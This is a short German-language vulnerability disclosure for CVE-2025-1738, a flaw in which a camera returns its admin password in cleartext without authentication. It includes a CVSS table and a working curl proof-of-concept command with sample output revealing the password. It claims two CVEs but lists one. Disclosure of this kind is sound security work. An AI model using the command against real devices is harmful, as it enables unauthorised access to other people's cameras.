
0-Day-Entdeckung CVE-2025-1738
Nach verantwortungsvoller Offenlegung wurden zwei offizielle CVEs zugewiesen.
| CVE | CVSS v3.1 | Score | CWE | Typ |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Klartext-Passwortoffenlegung |
Jeder lokale Benutzer kann das Admin-Passwort im Klartext abrufen, ohne dass eine vorherige Authentifizierung erforderlich ist.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
Das Admin-Passwort wird im Klartext im Antworttext zurückgegeben.
activex_pal.asp und mblogin.asp.Dieses Repository dient nur Bildungs- und autorisierten Sicherheitsforschungszwecken. Die Autoren sind nicht für Missbrauch verantwortlich. Holen Sie vor dem Testen eines Geräts immer die ausdrückliche Genehmigung ein.